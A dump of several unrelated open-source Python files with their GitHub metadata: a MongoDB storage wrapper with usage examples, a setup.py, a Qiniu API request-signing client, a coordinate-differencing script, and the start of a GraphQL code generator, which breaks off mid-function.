"content_hash": "fe5c8609b194785b169541a00798e92f",
"timestamp": "",
"source": "github",
"line_count": 186,
"max_line_length": 74,
"avg_line_length": 32.74193548387097,
"alnum_prop": 0.6394088669950739,
"repo_name": "lillian-lemmer/sappho",
"id": "8443b1485ffc22cdffc296bda91e0de05598a36d",
"size": "6090",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "sappho/camera.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "47553"
},
{
"name": "Shell",
"bytes": "113"
}
],
"symlink_target": ""
} |
"""
Perm Store
author: Kevin Jamieson, kevin.g.jamieson@gmail.com
last updated: 12/31/2014
Persistent storage solution. Database hierarchy is organized as: ::\n
PermStore[database_id][bucket_id][doc_uid] = {key1:value1,key2:value2,...}
Dependencies: next.constants to determine location of mongoDB server
Some common functions
###############################
Initialization::\n
db = PermStore()
Database functions::\n
exists,didSucceed,message = db.exists(database_id,bucket_id,doc_uid,key)
value,didSucceed,message = db.get(database_id,bucket_id,doc_uid,key)
doc,didSucceed,message = db.getDoc(database_id,bucket_id,doc_uid)
docs,didSucceed,message = db.getDocsByPattern(database_id,bucket_id,filter_dict)
didSucceed,message = db.set(database_id,bucket_id,doc_uid,key,value)
didSucceed,message = db.setDoc(database_id,bucket_id,doc_uid,doc)
didSucceed,message = db.delete(database_id,bucket_id,doc_uid,key)
didSucceed,message = db.deleteDoc(database_id,bucket_id,doc_uid)
didSucceed,message = db.deleteDocsByPattern(database_id,bucket_id,filter_dict)
didSucceed,message = db.deleteBucket(database_id,bucket_id)
didSucceed,message = db.deleteDatabase(database_id)
didSucceed,message = db.deleteAll()
Database inspection ::\n
docNames,didSucceed,message = db.getDocNames(database_id,bucket_id)
bucketNames,didSucceed,message = db.getBucketNames(database_id)
databaseNames,didSucceed,message = db.getDatabaseNames()
Some example usage
###############################
Let's first inititlize the database ::\n
from next.database.PermStore import PermStore
db = PermStore()
And let's assume that the database is empty, which we can enforce by deleting everything ::\n
didSucceed,message = db.deleteAll()
Building up a document one key at a time ::\n
database_id = 'things'
bucket_id = 'animals'
doc_uid = 'cat'
didSucceed,message = db.set(database_id,bucket_id,doc_uid,'color','black')
didSucceed,message = db.set(database_id,bucket_id,doc_uid,'num_legs',4)
didSucceed,message = db.set(database_id,bucket_id,doc_uid,'age',7.5)
Inserting a document ::\n
database_id = 'things'
bucket_id = 'animals'
doc_uid = 'dog'
doc = {'color':'brown','num_legs':4,'age':9.5}
didSucceed,message = db.setDoc(database_id,bucket_id,doc_uid,doc)
doc_uid = 'human'
doc = {'color':'tan','num_legs':2,'age':28}
didSucceed,message = db.setDoc(database_id,bucket_id,doc_uid,doc)
Retrieving values ::\n
value,didSucceed,message = db.get('things','animals','dog','age')
print value
>>> 9.5
Retrieving docs ::\n
doc,didSucceed,message = db.getDoc('things','animals','cat')
print doc
>>> {u'color': u'black', u'age': 7.5, u'_id': u'cat', u'num_legs': 4}
doc,didSucceed,message = db.getDoc('things','animals','dog')
print doc
>>> {u'color': u'brown', u'age': 9.5, u'_id': u'dog', u'num_legs': 4}
Advanced doc retrieval ::\n
docs,didSucceed,message = db.getDocsByPattern('things','animals',{})
print docs
>>> [{u'color': u'black', u'age': 7.5, u'_id': 'cat', u'num_legs': 4}, {u'color': u'brown', u'age': 9.5, u'_id': 'dog', u'num_legs': 4}, {u'color': u'tan', u'age': 28, u'_id': 'human', u'num_legs': 2}]
docs,didSucceed,message = db.getDocsByPattern('things','animals',{'num_legs':4})
>>> [{u'color': u'black', u'age': 7.5, u'_id': 'cat', u'num_legs': 4}, {u'color': u'brown', u'age': 9.5, u'_id': 'dog', u'num_legs': 4}]
docs,didSucceed,message = db.getDocsByPattern('things','animals',{'age':{ '$gte':8,'$lt':10} })
>>> [{u'color': u'brown', u'age': 9.5, u'_id': 'dog', u'num_legs': 4}]
docs,didSucceed,message = db.getDocsByPattern('things','animals',{'age':{ '$gte':8 }, 'num_legs':2 })
>>> [{u'color': u'tan', u'age': 28, u'_id': 'human', u'num_legs': 2}]
Doc retrival with time ::\n
from datetime import datetime,timedelta
t_0 = datetime.now()
t_1 = t_0 + timedelta(0,30)
t_2 = t_1 + timedelta(0,15)
t_3 = t_0 + timedelta(0,55)
# (if doc_uid=None, one is automatically generated)
didSucceed,message = db.setDoc('users','keys',None,{'user_id':'sd89w3hr292r','key':'a0jd103b2r','timestamp':t_0})
didSucceed,message = db.setDoc('users','keys',None,{'user_id':'sd89w3hr292r','key':'w8dh28232f','timestamp':t_1})
didSucceed,message = db.setDoc('users','keys',None,{'user_id':'sd89w3hr292r','key':'89yf9hgfwe','timestamp':t_2})
didSucceed,message = db.setDoc('users','keys',None,{'user_id':'sd89w3hr292r','key':'edhe2dqw9d','timestamp':t_3})
ts = t_1 - timedelta(0,1)
te = t_2 + timedelta(0,1)
docs,didSucceed,message = db.getDocsByPattern('users','keys',{'timestamp':{ '$gte':ts,'$lte':te } })
print docs
>>> [{u'timestamp': '2015-01-23 10:57:14.779000', u'_id': '54c2996c319da682ebb17576', u'user_id': u'sd89w3hr292r', u'key': u'w8dh28232f'}, {u'timestamp': '2015-01-23 10:57:29.779000', u'_id': '54c2996c319da682ebb17577', u'user_id': u'sd89w3hr292r', u'key': u'89yf9hgfwe'}]
"""
from pymongo import MongoClient
import next.constants as constants
from bson.binary import Binary
import cPickle
import traceback
from datetime import datetime
class PermStore(object):
"""
Acts as API to permanent store that can be passed around. Implements MongoDB
Attribtues:
client : MongoDB client
"""
def __init__(self):
self.client = MongoClient(constants.MONGODB_HOST, constants.MONGODB_PORT)
# self.client.write_concern = {'w':0}
def __del__(self):
try:
if self.client!=None:
self.client.close()
except:
pass
def connectToMongoServer(self):
try:
self.client = MongoClient(constants.MONGODB_HOST, constants.MONGODB_PORT)
if self.assertConnection():
# This makes it so the write signal is fired off and and does not wait for acknowledgment
# self.client.write_concern = {'w':0}
return True,''
else:
raise
error = 'Failed to connect to Mongodb server at %s:%s' % (constants.MONGODB_HOST,constants.MONGODB_PORT)
return False,error
return didSuccessfullyConnect,''
except:
return False,'Failed to connect to MongoDB Server'
def assertConnection(self):
"""
Checks that MongoDB is running
Inputs:
None
Outputs:
(boolean) isConnected
Usage: ::\n
db.assertConnection()
"""
try:
return bool(self.client.admin.command('ping')['ok'])
except:
return False
def makeProperDatabaseFormat(self,input_val):
"""
Example of usage: ::\n
>>> from next.database.PermStore import PermStore
>>> db = PermStore()
>>> import numpy
>>> X = numpy.zeros(3)
>>> from datetime import datetime
>>> timestamp = datetime.now()
>>> input = {'animal':'dog','age':4.5,'x':X,'time':timestamp}
>>> db_input = db.makeProperDatabaseFormat(input)
>>> db_input
{'x': Binary('\x80\x02cnumpy.core.multiarray\n_reconstruct\nq\x01cnumpy\nndarray\nq\x02K\x00\x85U\x01b\x87Rq\x03(K\x01K\x03\x85cnumpy\ndtype\nq\x04U\x02f8K\x00K\x01\x87Rq\x05(K\x03U\x01<NNNJ\xff\xff\xff\xffJ\xff\xff\xff\xffK\x00tb\x89U\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00tb.', 0), 'age': 4.5, 'animal': 'dog', 'time': datetime.datetime(2015, 1, 23, 10, 32, 28, 770190)}
>>> db_output = db.undoDatabaseFormat(db_input)
>>> db_output
{'x': array([ 0., 0., 0.]), 'age': 4.5, 'animal': 'dog', 'time': datetime.datetime(2015, 1, 23, 10, 32, 28, 770190)}
>>> input
{'x': array([ 0., 0., 0.]), 'age': 4.5, 'animal': 'dog', 'time': datetime.datetime(2015, 1, 23, 10, 32, 28, 770190)}
"""
if isinstance(input_val,dict):
for key in input_val:
input_val[key] = self.makeProperDatabaseFormat(input_val[key])
elif isinstance(input_val,list):
for idx in range(len(input_val)):
input_val[idx] = self.makeProperDatabaseFormat(input_val[idx])
elif isinstance(input_val, basestring):
pass
elif isinstance(input_val, (int, long, float) ):
pass
elif isinstance(input_val, datetime ):
pass
else:
# pickle value so we can handle any python type
pickled_input = cPickle.dumps(input_val, protocol=2)
input_val = Binary(pickled_input)
return input_val
def undoDatabaseFormat(self,input_val):
if isinstance(input_val,dict):
for key in input_val:
input_val[key] = self.undoDatabaseFormat(input_val[key])
elif isinstance(input_val,list):
for idx in range(len(input_val)):
input_val[idx] = self.undoDatabaseFormat(input_val[idx])
elif isinstance(input_val, Binary):
input_val = cPickle.loads(input_val)
return input_val
def get_index_information(self,database_id,bucket_id):
"""
Returns the description of all the indexes on the bucket
"""
info = self.client[database_id][bucket_id].index_information()
return info,True,''
def create_index(self,database_id,bucket_id,index_dict):
"""
Creates an index on the bucket defined by the keys in index_dict
self.client[database_id][bucket_id].create_index( {'num_eyes':1} )
"""
try:
index_list = []
for key in index_dict:
index_list.append( (key,index_dict[key]) )
message = self.client[database_id][bucket_id].create_index( index_list )
return True,message
except:
return False,'unknown error'
def drop_index(self,database_id,bucket_id,index_name):
"""
Deletes the index named index_name defined over the bucket_id
Inputs:
(string) database_id, (string) index_name
Outputs:
(bool) didSucceed, (string) message
"""
message = self.client[database_id][bucket_id].create_index( index_list )
return True,message
def drop_all_indexes(self,database_id,bucket_id):
"""
Deletes the index named index_name defined over the bucket_id
Inputs:
(string) database_id, (string) index_name
Outputs:
(bool) didSucceed, (string) message
"""
message = self.client[database_id][bucket_id].drop_indexes()
return True,message
def exists(self,database_id,bucket_id,doc_uid,key):
"""
Check existence of key
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key
Outputs:
(bool) exists, (bool) didSucceed, (string) message
Usage: ::\n
exists,didSucceed,message = db.exists(database_id,bucket_id,doc_uid,key)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
doc = self.client[database_id][bucket_id].find_one({"_id":doc_uid,key: { '$exists': True }})
key_exists = (doc!=None)
return key_exists,True,''
except:
error = "MongoDB.exists Failed with unknown exception"
return None,False,error
def get(self,database_id,bucket_id,doc_uid,key):
"""
Get a value corresponding to key, returns None if no key exists
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key
Outputs:
(string) value, (bool) didSucceed, (string) message
Usage: ::\n
value,didSucceed,message = db.get(database_id,bucket_id,doc_uid,key)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
doc = self.client[database_id][bucket_id].find_one({"_id":doc_uid,key: { '$exists': True }})
if doc == None:
message = 'MongoDB.get Key '+bucket_id+'.'+doc_uid+'.'+key+' does not exist'
return None,True,message
value = doc[key]
return_value = self.undoDatabaseFormat(value)
return return_value,True,'From MongoDB'
except:
return None,False,'MongoDB.get Failed with unknown exception'
def getDoc(self,database_id,bucket_id,doc_uid):
"""
get a doc (dictionary of string values) corresponding to a doc_uid with {"doc_uid":doc_uid} (if none, returns None)
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid
Outputs:
({ (string) key: (string) value, ... }) doc, (bool) didSucceed, (string) message
Usage: ::\n
doc,didSucceed,message = db.getDoc(database_id,bucket_id,doc_uid)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
doc = self.client[database_id][bucket_id].find_one({"_id":doc_uid})
return_doc = self.undoDatabaseFormat(doc)
return return_doc,True,''
except:
raise
error = "MongoDB.getDoc Failed with unknown exception"
return None,False,error
def getDocsByPattern(self,database_id,bucket_id,filter_dict):
"""
get all docs that contain {key1:value1,...} according to filter dict (if none, returns None)
Inputs:
(string) database_id, (string) bucket_id, (dict of key ,value strings)
Outputs:
({ (string) key: (string) value, ... }) docs, (bool) didSucceed, (string) message
Usage: ::\n
docs,didSucceed,message = db.getDocsByPattern(database_id,bucket_id,filter_dict)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
docs_iterator = self.client[database_id][bucket_id].find( filter_dict )
docs = []
for doc in docs_iterator:
doc = self.undoDatabaseFormat(doc)
try:
doc['_id'] = str(doc['_id'])
except:
pass
try:
doc['timestamp'] = str(doc['timestamp'])
except:
pass
docs.append(doc)
return docs,True,''
except:
error = "MongoDB.getDocs Failed with unknown exception"
return None,False,error
def increment(self,database_id,bucket_id,doc_uid,key,value):
"""
increments a key by amount value. If key does not exist, sets {key:value}
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key, (int) value
Outputs:
(int) new_value, (bool) didSucceed, (string) message
Usage: ::\n
new_value,didSucceed,message = db.increment(database_id,bucket_id,doc_uid,key,value)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
new_doc = self.client[database_id][bucket_id].find_and_modify(query={"_id":doc_uid} , update={ '$inc': {key:value} },upsert = True,new=True )
new_value = new_doc[key]
return new_value,True,'From Mongo'
except:
raise
error = "MongoDB.set Failed with unknown exception"
return False,error
def increment_many(self,database_id,bucket_id,doc_uid,key_value_dict):
"""
increments a key by amount value. If key does not exist, sets {key:value}
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, ({(str)key1:(float)value1,(int)key2:(float) value2}) key_value_dict
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.increment_many(database_id,bucket_id,doc_uid,key_value_dict)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
self.client[database_id][bucket_id].update_one({"_id":doc_uid},{ '$inc': key_value_dict },upsert = True)
return True,'From Mongo'
except:
raise
error = "MongoDB.set Failed with unknown exception"
return False,error
def get_list(self,database_id,bucket_id,doc_uid,key):
"""
gets saved by key. If key does not exist, returns None
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key
Outputs:
(list) list_value, (bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.get_list(database_id,bucket_id,doc_uid,key,value)
"""
return self.get(database_id,bucket_id,doc_uid,key)
def append_list(self,database_id,bucket_id,doc_uid,key,value):
"""
appends value to list saved by key. If key does not exist, sets {key:value}
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key, (int) value
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.set(database_id,bucket_id,doc_uid,key,value)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
value = self.makeProperDatabaseFormat(value)
message = self.client[database_id][bucket_id].update_one( {"_id":doc_uid} , { '$push': {key:value} },upsert = True )
return True,message
except:
raise
error = "MongoDB.set Failed with unknown exception"
return False,error
def set_list(self,database_id,bucket_id,doc_uid,key,value_list):
"""
sets a list to {key,value_list} (if already exists, replaces)
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key, (list) value_list
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.set_list(database_id,bucket_id,doc_uid,key,value)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
value_list = self.makeProperDatabaseFormat(value_list)
self.client[database_id][bucket_id].update_one( {"_id":doc_uid} , { '$unset': {key: '' } },upsert = True )
self.client[database_id][bucket_id].update_one( {"_id":doc_uid} , { '$push': {key: { '$each': value_list } } },upsert = True )
return True,''
except:
raise
error = "MongoDB.set Failed with unknown exception"
return False,error
def set(self,database_id,bucket_id,doc_uid,key,value):
"""
sets a {key,value} (if already exists, replaces)
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key, (string) value
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.set(database_id,bucket_id,doc_uid,key,value)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
value = self.makeProperDatabaseFormat(value)
message = self.client[database_id][bucket_id].update_one( {"_id":doc_uid} , { '$set': {key:value} },upsert = True )
return True,''
except:
raise
error = "MongoDB.set Failed with unknown exception"
return False,error
def setDoc(self,database_id,bucket_id,doc_uid,doc):
"""
set a doc (dictionary of string values). If doc_uid==None, uid automatically assigned
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, ({ (string) key: (string) value, ... }) doc
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.setDoc(database_id,bucket_id,doc_uid,key,value)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
if doc_uid != None:
doc['_id'] = doc_uid
doc = self.makeProperDatabaseFormat(doc)
write_id = self.client[database_id][bucket_id].insert(doc)
return True,''
except:
error = "MongoDB.insert Failed with unknown exception"
return False,error
def delete(self,database_id,bucket_id,doc_uid,key):
"""
deletes {key:value} associated with given key
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid, (string) key
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.delete(database_id,bucket_id,doc_uid,key)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
self.client[database_id][bucket_id].update_one( {"_id":doc_uid} , { '$unset': {key:1} })
return True,"MongoDB.delete"
except:
error = "MongoDB.deleteBucket Failed with unknown exception"
return False,error
def deleteDoc(self,database_id,bucket_id,doc_uid):
"""
deletes doc associated with given doc_uid
Inputs:
(string) database_id, (string) bucket_id, (string) doc_uid
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.deleteDoc(database_id,bucket_id,doc_uid)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
self.client[database_id][bucket_id].remove( {'_id':doc_uid} )
return True,''
except:
error = "MongoDB.deleteBucket Failed with unknown exception"
return False,error
def deleteDocsByPattern(self,database_id,bucket_id,filter_dict):
"""
delete all docs that contain {key1:value1,...} according to filter dict (if none, returns None)
Inputs:
(string) database_id, (string) bucket_id, (dict of key,value strings)
Outputs:
({ (string) key: (string) value, ... }) docs, (bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.deleteDocsByPattern(database_id,bucket_id,filter_dict)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return False,message
try:
dict_return = self.client[database_id][bucket_id].delete_one( filter_dict )
return True,str(dict_return)
except Exception, err:
error = traceback.format_exc()
return False,error
def deleteBucket(self,database_id,bucket_id):
"""
deletes bucket (and all docs in it) associated with given bucket_id
Inputs:
(string) database_id, (string) bucket_id
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.deleteBucket(database_id,bucket_id)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
self.client[database_id][bucket_id].drop()
return True,''
except:
error = "MongoDB.deleteBucket Failed with unknown exception"
return False,error
def deleteDatabase(self,database_id):
"""
deletes database (and all docs in it) associated with given bucket_id
Inputs:
(string) database_id
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.deleteDatabase(database_id)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
self.client.drop_database(database_id)
return True,''
except:
error = "MongoDB.deleteDatabase Failed with unknown exception"
return False,error
def deleteAll(self):
"""
delete all databases (i.e. everything)
Inputs:
None
Outputs:
(bool) didSucceed, (string) message
Usage: ::\n
didSucceed,message = db.deleteAll()
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
db_list = self.client.database_names()
for database_id in db_list:
if (database_id != 'local') and (database_id != 'admin'):
didSucceed,message = self.deleteDatabase(database_id)
return True,''
except:
error = "MongoDB.deleteDatabase Failed with unknown exception"
return False,error
def getDocNames(self,database_id,bucket_id):
"""
get list of doc_uids correspding to all the docs in the bucket corresponding to the given bucket_id
Inputs:
(string) database_id, (string) bucket_id
Outputs:
([(string) doc_uid, ... ]) docNames, (bool) didSucceed, (string) message
Usage: ::\n
docNames,didSucceed,message = db.getDocNames(database_id,bucket_id)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
docs_iterator = self.client[database_id][bucket_id].find()
doc_names = [doc['_id'] for doc in docs_iterator]
return doc_names,True,''
except:
error = "MongoDB.getDocNames Failed with unknown exception"
return None,False,error
def getBucketNames(self,database_id):
"""
get list of bucket_ids for corresponding database_id
Inputs:
(string) database_id
Outputs:
([(string) bucket_id, ... ]) docNames, (bool) didSucceed, (string) message
Usage: ::\n
bucketNames,didSucceed,message = db.getBucketNames(database_id)
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
buckets_iterator = self.client[database_id].collection_names()
bucket_names = [bucket for bucket in buckets_iterator]
return bucket_names,True,''
except:
error = "MongoDB.getBucketNames Failed with unknown exception"
return None,False,error
def getDatabaseNames(self):
"""
gets list of database names (currently just app_data and app_logs, by default all above methods only funciton on app_data aside from the logs)
Inputs:
None
Outputs:
([(string) bucket_id, ... ]) databaseNames, (bool) didSucceed, (string) message
Usage:
databaseNames,didSucceed,message = db.getDatabaseNames()
"""
if self.client == None:
didSucceed,message = self.connectToMongoServer()
if not didSucceed:
return None,False,message
try:
databases_iterator = self.client.database_names()
database_names = [database for database in databases_iterator]
return database_names,True,''
except:
error = "MongoDB.getDatabaseNames Failed with unknown exception"
return None,False,error
| {
"content_hash": "3b3dc0b8127c2de2c20264b543488774",
"timestamp": "",
"source": "github",
"line_count": 849,
"max_line_length": 445,
"avg_line_length": 35.38398115429918,
"alnum_prop": 0.5641623115076063,
"repo_name": "crcox/NEXT",
"id": "fc6e74f208a6f245d588bf4f9c8c2a3e00933956",
"size": "30041",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "next/database_client/PermStore/PermStore.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "74514"
},
{
"name": "JavaScript",
"bytes": "16603"
},
{
"name": "Python",
"bytes": "817267"
},
{
"name": "Shell",
"bytes": "5783"
}
],
"symlink_target": ""
} |
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name='recsys_data_pipeline',
version='1.0',
install_requires=[],
packages=find_packages(),
) | {
"content_hash": "610b15b3b1d7fe72ab7400908ec3fa13",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 70,
"avg_line_length": 22.583333333333332,
"alnum_prop": 0.6420664206642066,
"repo_name": "chrisbangun/dataflow-appengine",
"id": "9020850f43d33ba341d8cc862e505982a758c231",
"size": "271",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "6075"
},
{
"name": "JavaScript",
"bytes": "6345"
},
{
"name": "Python",
"bytes": "943330"
}
],
"symlink_target": ""
} |
from urlparse import urlparse
import hmac
from hashlib import sha1
from base64 import urlsafe_b64encode
from .. import rpc
from .. import conf
class Mac(object):
access = None
secret = None
def __init__(self, access=None, secret=None):
if access is None and secret is None:
access, secret = conf.ACCESS_KEY, conf.SECRET_KEY
self.access, self.secret = access, secret
def __sign(self, data):
hashed = hmac.new(self.secret, data, sha1)
return urlsafe_b64encode(hashed.digest())
def sign(self, data):
return '%s:%s' % (self.access, self.__sign(data))
def sign_with_data(self, b):
data = urlsafe_b64encode(b)
return '%s:%s:%s' % (self.access, self.__sign(data), data)
def sign_request(self, path, body, content_type):
parsedurl = urlparse(path)
p_query = parsedurl.query
p_path = parsedurl.path
data = p_path
if p_query != "":
data = ''.join([data, '?', p_query])
data = ''.join([data, "\n"])
if body:
incBody = [
"application/x-www-form-urlencoded",
]
if content_type in incBody:
data += body
return '%s:%s' % (self.access, self.__sign(data))
class Client(rpc.Client):
def __init__(self, host, mac=None):
if mac is None:
mac = Mac()
super(Client, self).__init__(host)
self.mac = mac
def round_tripper(self, method, path, body, header={}):
token = self.mac.sign_request(
path, body, header.get("Content-Type"))
header["Authorization"] = "QBox %s" % token
return super(Client, self).round_tripper(method, path, body, header)
| {
"content_hash": "e38e5e4361e161b0dca89c75eb7e09e3",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 76,
"avg_line_length": 28.737704918032787,
"alnum_prop": 0.5653166001140901,
"repo_name": "davidvon/pipa-pay-server",
"id": "dcee6fbcfe6ad961d28b45938ef2931967a05933",
"size": "1777",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "site-packages/qiniu/auth/digest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "6349"
},
{
"name": "CSS",
"bytes": "6111"
},
{
"name": "HTML",
"bytes": "73437"
},
{
"name": "JavaScript",
"bytes": "34960"
},
{
"name": "Nginx",
"bytes": "3074"
},
{
"name": "Python",
"bytes": "13078022"
}
],
"symlink_target": ""
} |
err_msg = """
Typical Usage:
raw2subtractlines.py [-norm] < coordinate_file
Coordinates read from one line of the file are subtracted from coordinates
from the next line of the file (if it contains coordinates) and printed to
the standard output. Blank lines in the input file are copied to the
standard out. Each block of N lines of text containing M columns in the
input file produces a block of N-1 lines of text (containing M columns)
in the output file.
The optional "-norm" argument allows you to normalize the resulting vectors
after they have been subtracted.
Examples:
raw2subtractlines.py < coord_bead_chain.raw > coords_bond_vector.raw
raw2subtractlines.py -norm < coord_bead_chain.raw > coords_bond_direction.raw
"""
import sys
from math import *
#import numpy as np
def ProcessStructure(x_id, normalize=False):
D = len(x_id[0])
N = len(x_id)
for i in range(0, N-1):
for d in range(0, D):
x_diff = [x_id[i+1][d] - x_id[i][d] for d in range(0,D)]
if (normalize):
x_diff_len = 0.0
for d in range(0, D):
x_diff_len += x_diff[d] * x_diff[d]
x_diff_len = sqrt(x_diff_len)
for d in range(0, D):
x_diff[d] /= x_diff_len
sys.stdout.write(str(x_diff[0]))
for d in range(1, D):
sys.stdout.write(' ' + str(x_diff[d]))
sys.stdout.write('\n')
# Parse the argument list:
if (len(sys.argv) > 2):
sys.stderr.write("Error:\n\nTypical Usage:\n\n"+err_msg+"\n")
exit(1)
if ((len(sys.argv) == 2) and
((sys.argv[1] == '-h') or
(sys.argv[1] == '-?') or
(sys.argv[1] == '--help'))):
sys.stderr.write("Error:\n\nTypical Usage:\n\n"+err_msg+"\n")
exit(1)
normalize = False
if (len(sys.argv) == 2):
if ((sys.argv[1] == '-n') or
(sys.argv[1] == '-norm') or
(sys.argv[1] == '-normalize')):
normalize = True
else:
sys.stderr.write("Error: Unrecognized command line argument:\n"
" \""+sys.argv[1]+"\"\n")
exit(1)
# Now read the input file:
x_id = []
count_structs = 0
is_new_structure = True
interpret_blank_lines_as_new_structures = True
in_file = sys.stdin
for line_orig in in_file:
ic = line_orig.find('#')
if ic != -1:
line = line_orig[:ic]
else:
line = line_orig.rstrip('\n')
tokens = line.strip().split()
if len(tokens) == 0:
if (interpret_blank_lines_as_new_structures and
(len(x_id) > 0)):
# blank (or comment) lines signal the next frame of animation
ProcessStructure(x_id, normalize)
sys.stdout.write('\n')
x_id = []
count_structs += 1
#sys.stderr.write('done\n')
is_new_structure = True
continue # skip blank lines or comments
elif is_new_structure:
is_new_structure = False
# x_d contains the coordinates read from the
# most recent line in the current frame
x_d = list(map(float, tokens))
x_id.append(x_d)
if len(x_id) > 0:
ProcessStructure(x_id, normalize)
| {
"content_hash": "15f00cbc110a53e42f51a9d9c1a6af6a",
"timestamp": "",
"source": "github",
"line_count": 114,
"max_line_length": 80,
"avg_line_length": 27.859649122807017,
"alnum_prop": 0.575566750629723,
"repo_name": "jewettaij/moltemplate",
"id": "dd01e783d193f0b15b03d06faa19b2b3086e42b5",
"size": "3200",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "examples/coarse_grained/DNA_models/dsDNA_only/2strands/3bp_2particles/simple_dna_example/measure_persistence_length/raw2subtractlines.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "228"
},
{
"name": "Python",
"bytes": "1751104"
},
{
"name": "Shell",
"bytes": "178239"
}
],
"symlink_target": ""
} |
import re
from datetime import datetime
from uuid import UUID
from enum import Enum, auto
from graphql.language.source import Source
from graphql.language.parser import parse
from graphql.language.ast import (
ObjectTypeDefinition,
NamedType,
NonNullType,
ListType,
InputObjectTypeDefinition,
EnumTypeDefinition,
)
from graphscale.utils import param_check
def parse_grapple(grapple_string):
ast = parse(Source(grapple_string))
grapple_types = []
for type_node in ast.definitions:
grapple_types.append(create_grapple_type_definition(type_node))
return GrappleDocument(types=grapple_types)
def print_grapple_pents(document_ast):
writer = CodeWriter()
for object_type in document_ast.object_types():
if object_type.generate_pent():
print_generated_pent(writer, object_type)
writer.blank_line()
return writer.result()
def print_graphql_defs(document_ast):
writer = CodeWriter()
for object_type in document_ast.object_types():
print_graphql_object_type(writer, document_ast, object_type)
for input_type in document_ast.input_types():
print_graphql_input_type(writer, input_type)
for enum_type in document_ast.enum_types():
print_graphql_enum_type(writer, enum_type)
return writer.result()
def uncapitalized(string):
return string[0].lower() + string[1:]
def print_graphql_top_level(document_ast):
writer = CodeWriter()
writer.line('def generated_query_fields(pent_map):')
writer.increase_indent() # function body
writer.line('return {')
writer.increase_indent() # dictionary body
for grapple_type in document_ast.object_types():
if not grapple_type.has_field('id'): # needs to be fetchable
continue
field_name = uncapitalized(grapple_type.name())
graphql_type_inst = 'GraphQL%s.type()' % grapple_type.name()
writer.line("'%s': define_top_level_getter(%s, pent_map['%s'])," %
(field_name, graphql_type_inst, grapple_type.name()))
writer.decrease_indent() # end dictionary body
writer.line('}')
writer.decrease_indent() # end function body
writer.blank_line()
return writer.result()
def print_graphql_input_type(writer, grapple_type):
writer.line('class GraphQL%s(GrappleType):' % grapple_type.name())
writer.increase_indent() # begin class definition
writer.line('@staticmethod')
writer.line('def create_type():')
